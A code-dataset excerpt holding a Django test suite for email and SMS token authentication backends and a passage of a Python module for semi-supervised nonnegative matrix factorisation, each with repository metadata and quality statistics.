hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
17610a04c222fb0d535f11fe978558a57947af2a
| 4,946
|
py
|
Python
|
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | 1
|
2020-05-25T22:09:40.000Z
|
2020-05-25T22:09:40.000Z
|
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | null | null | null |
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | null | null | null |
from unittest.mock import MagicMock, patch
from django.contrib.auth import get_user_model
from django.test import TestCase, Client, override_settings
from stagedoor.backends import EmailTokenBackend, SMSTokenBackend, StageDoorBackendMixin
from stagedoor.models import AuthToken, Email, PhoneNumber, generate_token_string
class StageDoorBackendMixinTests(TestCase):
    """Tests for StageDoorBackendMixin's user lookup and token authentication."""

    def test_get_user_happy_path(self):
        """get_user returns the user matching the given id."""
        backend = StageDoorBackendMixin()
        user = get_user_model().objects.create()
        user_from_backend = backend.get_user(user_id=user.id)
        self.assertEqual(user, user_from_backend)

    def test_get_user_no_user(self):
        """get_user returns None when no user has the given id."""
        backend = StageDoorBackendMixin()
        user_from_backend = backend.get_user(user_id=7)
        self.assertEqual(None, user_from_backend)

    def test_authenticate_happy_path(self):
        """authenticate succeeds for a token string that was persisted."""
        backend = StageDoorBackendMixin()
        token_string = generate_token_string(email=True)
        token = AuthToken.objects.create(token=token_string)
        user = backend.authenticate(None, token_string)
        self.assertIsNotNone(user)

    def test_authenticate_no_token(self):
        """authenticate fails for a token string that was never persisted."""
        backend = StageDoorBackendMixin()
        token_string = generate_token_string(email=True)
        user = backend.authenticate(None, token_string)
        self.assertIsNone(user)

    def test_single_use_token(self):
        """A token authenticates at most once and is consumed on success.

        BUGFIX(review): the original test duplicated test_get_user_happy_path
        and never created or used a token, so the final assertion on
        AuthToken.objects was vacuously true. Now it actually exercises
        single-use semantics.
        """
        backend = StageDoorBackendMixin()
        token_string = generate_token_string(email=True)
        AuthToken.objects.create(token=token_string)
        user = backend.authenticate(None, token_string)
        self.assertIsNotNone(user)
        # The token must be consumed by the successful authentication...
        self.assertEqual(0, len(AuthToken.objects.all()))
        # ...so replaying the same token string must fail.
        self.assertIsNone(backend.authenticate(None, token_string))
class EmailBackendTests(TestCase):
    """Exercise EmailTokenBackend.authenticate end to end."""

    def _issue_token(self, email_obj):
        """Persist a fresh email auth token for *email_obj*; return its string."""
        token_string = generate_token_string(email=True)
        AuthToken.objects.create(email=email_obj, token=token_string)
        return token_string

    def test_happy_path(self):
        """A valid token yields a user linked to the email address."""
        address = Email.objects.create(email="hello@hellocaller.app")
        token_string = self._issue_token(address)
        user = EmailTokenBackend().authenticate(None, token=token_string)
        self.assertIsNotNone(user)
        self.assertEqual("hello@hellocaller.app", user.email)
        address.refresh_from_db()
        self.assertEqual(user, address.user)

    def test_no_token(self):
        """authenticate returns None when the token does not exist."""
        result = EmailTokenBackend().authenticate(None, token="hello@hellocaller.app")
        self.assertIsNone(result)

    def test_user_already_exists(self):
        """Authenticating twice for the same address resolves to the same user."""
        address = Email.objects.create(email="hello@hellocaller.app")
        backend = EmailTokenBackend()
        first = backend.authenticate(None, token=self._issue_token(address))
        self.assertIsNotNone(first)
        self.assertEqual("hello@hellocaller.app", first.email)
        address.refresh_from_db()
        self.assertEqual(first, address.user)
        # A second token for the same address must not create a new user.
        second = backend.authenticate(None, token=self._issue_token(address))
        address.refresh_from_db()
        self.assertIsNotNone(second)
        self.assertEqual("hello@hellocaller.app", second.email)
        self.assertEqual(second, address.user)
class SMSBackendTests(TestCase):
    """Exercise SMSTokenBackend.authenticate end to end."""

    def _issue_token(self, number_obj):
        """Persist a fresh SMS auth token for *number_obj*; return its string."""
        token_string = generate_token_string(sms=True)
        AuthToken.objects.create(phone_number=number_obj, token=token_string)
        return token_string

    def test_happy_path(self):
        """A valid token yields a user linked to the phone number."""
        number = PhoneNumber.objects.create(phone_number="+14158675309")
        token_string = self._issue_token(number)
        user = SMSTokenBackend().authenticate(None, token=token_string)
        self.assertIsNotNone(user)
        number = PhoneNumber.objects.get(phone_number="+14158675309")
        self.assertEqual(user, number.user)

    def test_no_token(self):
        """authenticate returns None when the token does not exist."""
        result = SMSTokenBackend().authenticate(None, token="+14158675310")
        self.assertIsNone(result)

    def test_user_already_exists(self):
        """Authenticating twice for the same number resolves to the same user."""
        number = PhoneNumber.objects.create(phone_number="+14158675309")
        backend = SMSTokenBackend()
        first = backend.authenticate(None, token=self._issue_token(number))
        self.assertIsNotNone(first)
        number = PhoneNumber.objects.get(phone_number="+14158675309")
        self.assertEqual(first, number.user)
        # A second token for the same number must not create a new user.
        second = backend.authenticate(None, token=self._issue_token(number))
        self.assertIsNotNone(second)
        number = PhoneNumber.objects.get(phone_number="+14158675309")
        self.assertEqual(second, number.user)
| 38.341085
| 88
| 0.712495
| 565
| 4,946
| 6.021239
| 0.132743
| 0.103469
| 0.061141
| 0.079365
| 0.837155
| 0.797472
| 0.783363
| 0.725162
| 0.700764
| 0.674897
| 0
| 0.017077
| 0.194905
| 4,946
| 128
| 89
| 38.640625
| 0.837268
| 0.020016
| 0
| 0.795699
| 0
| 0
| 0.040875
| 0.026012
| 0
| 0
| 0
| 0
| 0.247312
| 1
| 0.11828
| false
| 0
| 0.053763
| 0
| 0.204301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1764688007b339099e066fde3467d3e902da9720
| 27,979
|
py
|
Python
|
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Class and functions for training (SS)NMF model.
The NMF model consists of the data matrix to be factorized, X, the factor matrices, A and
S. Each model also consists of a label matrix, Y, classification factor matrix, B, and
classification weight parameter, lam (although these three variables will be empty if Y is not
input). These parameters define the objective function defining the model:
(1) ||X - AS||_F^2 (train with mult) or
(2) ||X - AS||_F^2 + lam * ||Y - BS||_F^2 (train with snmfmult) or
(3) ||X - AS||_F^2 + lam * D(Y||BS) (train with klsnmfmult).
Examples
--------
unsupervised (1), saving errors, declaring number of iterations
>>> numIters = 100
>>> model = SSNMF(numpy.random.rand(100,100),10)
>>> errs = model.mult(saveerrs = True,numiters = numIters)
unsupervised (1) with missing data, not saving errors, declaring number of iterations
>>> numIters = 100
>>> model = SSNMF(numpy.random.rand(100,100),10, W = data['obsdata'])
>>> model.mult(numiters = numIters)
supervised (2), saving errors, default number of iterations
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'])
>>> errs = model.snmfmult(saveerrs = True)
semi-supervised (2), saving errors, default number of iterations
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'], L = data['obslabels'])
>>> errs = model.snmfmult(saveerrs = True)
supervised (3), not saving errors, declaring number of iterations
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'])
>>> model.klsnmfmult(numiters = numIters)
semi-supervised (3), not saving errors, declaring number of iterations and regularization parameter lam
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, lam = 0.1, Y = data['labelmat'], L = data['obslabels'])
>>> model.klsnmfmult(numiters = numIters)
semi-supervised (3) with missing data, not saving errors, declaring number of iterations
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'], W = data['obsdata'], L = data['obslabels'])
>>> model.klsnmfmult(numiters = numIters)
'''
import numpy as np
from numpy import linalg as la
class SSNMF:
    """
    Class for (SS)NMF model.

    The NMF model consists of the data matrix to be factorized, X, the factor matrices, A and
    S. Each model also consists of a label matrix, Y, classification factor matrix, B, and
    classification weight parameter, lam (although these three variables will be empty if Y is not
    input). These parameters define the objective function defining the model:
    (1) ||X - AS||_F^2 (train with mult) or
    (2) ||X - AS||_F^2 + lam * ||Y - BS||_F^2 (train with snmfmult) or
    (3) ||X - AS||_F^2 + lam * D(Y||BS) (train with klsnmfmult).
    ...

    Parameters
    ----------
    X : array
        Data matrix of size m x n.
    k : int_
        Number of topics.
    Y : array, optional
        Label matrix of size p x n (default is None).
    W : array, optional
        Binary matrix of size m x n, whether the data is observed or not (default is None).
        NOTE(review): previously documented as p x n, but __init__ validates W against the
        dimensions of X, which is m x n.
    L : array, optional
        Binary matrix of size p x n, whether the label is known or not (default is None).
        NOTE(review): previously documented as m x n, but __init__ validates L against the
        dimensions of Y, which is p x n.
    lam : float_, optional
        Weight parameter for classification term in objective (the default is 1 if Y is not
        None, None otherwise).
    A : array, optional
        Initialization for left factor matrix of X of size m x k (the default is a matrix with
        uniform random entries).
    S : array, optional
        Initialization for right factor matrix of X of size k x n (the default is a matrix with
        uniform random entries).
    B : array, optional
        Initialization for left factor matrix of Y of size p x k (the default is a matrix with
        uniform random entries if Y is not None, None otherwise).

    Methods
    -------
    mult(numiters = 10, saveerrs = True)
        Train the unsupervised model (1) via numiters multiplicative updates.
    snmfmult(numiters = 10, saveerrs = True)
        Train the (semi-)supervised model (2) via numiters multiplicative updates.
    klsnmfmult(numiters = 10, saveerrs = True)
        Train the (semi-)supervised model (3) via numiters multiplicative updates.
    accuracy()
        Compute the classification accuracy of semi-supervised model (using Y, B, and S).
    kldiv()
        Compute the I-divergence, D(Y||BS), of semi-supervised model (using Y, B, and S).
    """
    def __init__(self, X, k, **kwargs):
        self.X = X
        rows = np.shape(X)[0]
        cols = np.shape(X)[1]
        self.A = kwargs.get('A',np.random.rand(rows,k)) #initialize factor A
        self.S = kwargs.get('S',np.random.rand(k,cols)) #initialize factor S
        #check dimensions of X, A, and S match
        if rows != np.shape(self.A)[0]:
            raise Exception('The row dimensions of X and A are not equal.')
        if cols != np.shape(self.S)[1]:
            raise Exception('The column dimensions of X and S are not equal.')
        if np.shape(self.A)[1] != k:
            raise Exception('The column dimension of A is not equal to the input number of topics.')
        if np.shape(self.S)[0] != k:
            raise Exception('The row dimension of S is not equal to the input number of topics.')
        #supervision initializations (optional)
        self.Y = kwargs.get('Y',None)
        if self.Y is not None:
            #check dimensions of X and Y match
            if np.shape(self.Y)[1] != np.shape(self.X)[1]:
                raise Exception('The column dimensions of X and Y are not equal.')
            classes = np.shape(self.Y)[0]
            self.B = kwargs.get('B',np.random.rand(classes,k))
            self.lam = kwargs.get('lam',1)
            #check dimensions of Y, S, and B match
            if np.shape(self.B)[0] != classes:
                raise Exception('The row dimensions of Y and B are not equal.')
            if np.shape(self.B)[1] != k:
                raise Exception('The column dimension of B is not equal to the input number of topics.')
        else:
            #unsupervised model: no classification factor or weight
            self.B = None
            self.lam = None
        # missing data (optional)
        self.W = kwargs.get('W',None)
        if self.W is not None:
            #check dimensions of X and W match
            if np.shape(self.W)[0] != np.shape(self.X)[0]:
                raise Exception('The row dimensions of X and W are not equal.')
            if np.shape(self.W)[1] != np.shape(self.X)[1]:
                raise Exception('The column dimensions of X and W are not equal.')
        # missing labels, semi-supervision (optional)
        self.L = kwargs.get('L',None)
        if self.L is not None:
            #check dimensions of Y and L match
            if np.shape(self.L)[0] != np.shape(self.Y)[0]:
                raise Exception('The row dimensions of Y and L are not equal.')
            if np.shape(self.L)[1] != np.shape(self.Y)[1]:
                raise Exception('The column dimensions of Y and L are not equal.')
    def mult(self,**kwargs):
        '''
        Multiplicative updates for training unsupervised NMF model (1).

        Parameters
        ----------
        numiters : int_, optional
            Number of iterations of updates to run (default is 1000).
            NOTE(review): previously documented as 10; the code default is 1000.
        saveerrs : bool, optional
            Boolean indicating whether to save model errors during iterations.
        eps : float_, optional
            Epsilon value to prevent division by zero (default is 1e-10).

        Returns
        -------
        errs : array, optional
            If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
        '''
        numiters = kwargs.get('numiters', 1000)
        saveerrs = kwargs.get('saveerrs', False)
        eps = kwargs.get('eps', 1e-10)
        if saveerrs:
            errs = np.empty(numiters) #initialize error array
        if self.W is None:
            for i in range(numiters):
                #multiplicative updates for A and S (eps in denominators guards against divide-by-zero)
                self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
                    self.X @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S,eps+ np.transpose(self.A) @ self.A @ self.S), \
                    np.transpose(self.A) @ self.X)
                if saveerrs:
                    errs[i] = la.norm(self.X - self.A @ self.S, 'fro') #save reconstruction error
            print("Completed NMF for unsupervised learning without missing data.")
            if saveerrs:
                return [errs]
        elif self.W is not None:
            for i in range(numiters):
                #multiplicative updates for A and S, masking unobserved entries with W
                self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.W,self.X) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S,eps+ np.transpose(self.A) @ np.multiply(self.W,self.A @ self.S)), \
                    np.transpose(self.A) @ np.multiply(self.W,self.X))
                if saveerrs:
                    errs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W, self.A @ self.S), 'fro') #save reconstruction error
            print("Completed NMF for unsupervised learning with missing data.")
            if saveerrs:
                return [errs]
    def snmfmult(self,**kwargs):
        '''
        Multiplicative updates for training semi-supervised NMF model (2).

        Parameters
        ----------
        numiters : int_, optional
            Number of iterations of updates to run (default is 1000).
            NOTE(review): previously documented as 10; the code default is 1000.
        saveerrs : bool, optional
            Boolean indicating whether to save model errors during iterations.
        eps : float_, optional
            Epsilon value to prevent division by zero (default is 1e-10).

        Returns
        -------
        errs : array, optional
            If saveerrs, returns array of ||X - AS||_F^2 + lam ||Y - BS||_F^2 for each
            iteration (length numiters).
        reconerrs : array, optional
            If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
        classerrs : array, optional
            If saveerrs, returns array of ||Y - BS||_F for each iteration (length numiters).
        classaccs : array, optional
            If saveerrs, returns array of classification accuracy (computed with Y, B, S) at each
            iteration (length numiters).

        Raises
        ------
        Exception
            If no label matrix Y was provided at construction.
        '''
        numiters = kwargs.get('numiters', 1000)
        saveerrs = kwargs.get('saveerrs', False)
        eps = kwargs.get('eps', 1e-10)
        if saveerrs:
            errs = np.empty(numiters) #initialize error array
            reconerrs = np.empty(numiters)
            classerrs = np.empty(numiters)
            classaccs = np.empty(numiters)
        if self.Y is None:
            #if no label matrix provided, train unsupervised model instead
            raise Exception('Label matrix Y not provided: train with mult instead.')
        #the four branches below are the same update rule with masks W (data) and/or L (labels) applied
        if self.L is None and self.W is None:
            # supervised learning, without missing data
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
                    self.X @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B, eps+ self.B @ self.S @ np.transpose(self.S)), \
                    self.Y @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ self.A @ self.S + \
                    self.lam * np.transpose(self.B) @ self.B @ self.S), \
                    np.transpose(self.A) @ self.X + self.lam * np.transpose(self.B) \
                    @ self.Y)
                if saveerrs:
                    reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
                    classerrs[i] = la.norm(self.Y - self.B @ self.S, 'fro')
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
                    classaccs[i] = self.accuracy()
            print("Completed SSNMF for supervised learning without missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        elif self.L is not None and self.W is None:
            # semi-supervised learning, without missing data
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
                    self.X @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B, eps+ np.multiply(self.L,self.B @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.L,self.Y) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ self.A @ self.S + \
                    self.lam * np.transpose(self.B) @ np.multiply(self.L,self.B @ self.S)), \
                    np.transpose(self.A) @ self.X + self.lam * np.transpose(self.B) \
                    @ np.multiply(self.L,self.Y))
                if saveerrs:
                    reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
                    classerrs[i] = la.norm(np.multiply(self.L,self.Y) - np.multiply(self.L,self.B @ self.S), 'fro')
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
                    classaccs[i] = self.accuracy()
            print("Completed SSNMF for semi-supervised learning without missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        elif self.L is None and self.W is not None:
            # supervised learning, with missing data
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.W,self.X) @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B, eps+ self.B @ self.S @ np.transpose(self.S)), \
                    self.Y @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
                    self.lam * np.transpose(self.B) @ self.B @ self.S), \
                    np.transpose(self.A) @ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) \
                    @ self.Y)
                if saveerrs:
                    reconerrs[i] = la.norm(np.multiply(self.W, self.X) - np.multiply(self.W, self.A @ self.S), 'fro')
                    classerrs[i] = la.norm(self.Y - self.B @ self.S, 'fro')
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
                    classaccs[i] = self.accuracy()
            print("Completed SSNMF for supervised learning with missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        elif self.W is not None and self.L is not None:
            # semisupervised learning, with missing data
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.W,self.X) @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B, eps+ np.multiply(self.L, self.B @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.L, self.Y) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
                    self.lam * np.transpose(self.B) @ np.multiply(self.L,self.B @ self.S)), \
                    np.transpose(self.A) @ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) \
                    @np.multiply(self.L, self.Y))
                if saveerrs:
                    reconerrs[i] = la.norm(np.multiply(self.W, self.X) - np.multiply(self.W, self.A @ self.S), 'fro')
                    classerrs[i] = la.norm(np.multiply(self.L, self.Y) - np.multiply(self.L, self.B @ self.S), 'fro')
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
                    classaccs[i] = self.accuracy()
            print("Completed SSNMF for semi-supervised learning with missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
    def klsnmfmult(self,**kwargs):
        '''
        Multiplicative updates for training semi-supervised NMF model (3).

        Parameters
        ----------
        numiters : int_, optional
            Number of iterations of updates to run (default is 1000).
            NOTE(review): previously documented as 10; the code default is 1000.
        saveerrs : bool, optional
            Boolean indicating whether to save model errors during iterations.
        eps : float_, optional
            Epsilon value to prevent division by zero (default is 1e-10).

        Returns
        -------
        errs : array, optional
            If saveerrs, returns array of ||X - AS||_F^2 + lam D(Y||BS) for each
            iteration (length numiters).
        reconerrs : array, optional
            If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
        classerrs : array, optional
            If saveerrs, returns array of D(Y||BS) for each iteration (length numiters).
        classaccs : array, optional
            If saveerrs, returns array of classification accuracy (computed with Y, B, S) at each
            iteration (length numiters).

        Raises
        ------
        Exception
            If no label matrix Y was provided at construction.
        '''
        numiters = kwargs.get('numiters', 1000)
        saveerrs = kwargs.get('saveerrs', False)
        eps = kwargs.get('eps', 1e-10)
        if saveerrs:
            errs = np.empty(numiters) #initialize error array
            reconerrs = np.empty(numiters)
            classerrs = np.empty(numiters)
            classaccs = np.empty(numiters)
        if self.Y is None:
            #if no label matrix provided, train unsupervised model instead
            raise Exception('Label matrix Y not provided: train with mult instead.')
        classes = np.shape(self.Y)[0]
        cols = np.shape(self.Y)[1]
        #the four branches below are the same update rule; with missing labels,
        #the mask L replaces the all-ones matrix in the B and S denominators
        if self.L is None and self.W is None:
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
                    self.X @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B,eps+ np.ones((classes,cols)) @ np.transpose(self.S)), \
                    np.divide(self.Y, eps+ self.B @ self.S) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ self.A @ self.S + \
                    self.lam * np.transpose(self.B) @ \
                    np.ones((classes,cols)))),2 * np.transpose(self.A) \
                    @ self.X + self.lam * np.transpose(self.B) @ \
                    np.divide(self.Y, eps+ self.B @ self.S))
                if saveerrs:
                    reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
                    classerrs[i] = self.kldiv()
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
                    classaccs[i] = self.accuracy()
            print("Completed I-SSNMF for supervised learning without missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        if self.L is None and self.W is not None:
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.W, self.X) @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B,eps+ np.ones((classes,cols)) @ np.transpose(self.S)), \
                    np.divide(self.Y, eps+ self.B @ self.S) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
                    self.lam * np.transpose(self.B) @ \
                    np.ones((classes,cols)))),2 * np.transpose(self.A) \
                    @ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) @ \
                    np.divide(self.Y, eps+ self.B @ self.S))
                if saveerrs:
                    reconerrs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W,self.A @ self.S), 'fro')
                    classerrs[i] = self.kldiv()
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
                    classaccs[i] = self.accuracy()
            print("Completed I-SSNMF for supervised learning with missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        if self.L is not None and self.W is None:
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
                    self.X @ np.transpose(self.S))
                self.B = np.multiply(np.divide(self.B,eps+ self.L @ np.transpose(self.S)), \
                    np.divide(np.multiply(self.L, self.Y), eps+ np.multiply(self.L,self.B @ self.S)) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ self.A @ self.S + \
                    self.lam * np.transpose(self.B) @ \
                    self.L)),2 * np.transpose(self.A) \
                    @ self.X + self.lam * np.transpose(self.B) @ \
                    np.divide(np.multiply(self.L,self.Y), eps+ np.multiply(self.L,self.B @ self.S)))
                if saveerrs:
                    reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
                    classerrs[i] = self.kldiv()
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
                    classaccs[i] = self.accuracy()
            print("Completed I-SSNMF for semi-supervised learning without missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
        if self.L is not None and self.W is not None:
            for i in range(numiters):
                #multiplicative updates for A, S, and B
                self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W,self.A @ self.S) @ np.transpose(self.S)), \
                    np.multiply(self.W,self.X) @ np.transpose(self.S))
